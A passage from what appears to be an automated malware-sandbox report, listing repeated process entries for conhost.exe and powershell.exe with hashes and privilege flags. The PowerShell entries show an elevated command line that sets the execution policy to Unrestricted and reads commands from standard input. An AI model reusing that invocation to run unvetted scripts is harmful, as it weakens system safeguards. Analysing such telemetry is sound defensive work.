                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:52
                                                                                                                                                                                                                                              Start time:12:24:58
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:53
                                                                                                                                                                                                                                              Start time:12:24:58
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:54
                                                                                                                                                                                                                                              Start time:12:24:58
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Imagebase:0x7ff741d30000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:55
Start time:12:24:58
Start date:23/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:56
Start time:12:24:58
Start date:23/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Imagebase:0x7ff741d30000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:57
Start time:12:24:58
Start date:23/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:58
Start time:12:24:58
Start date:23/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

No disassembly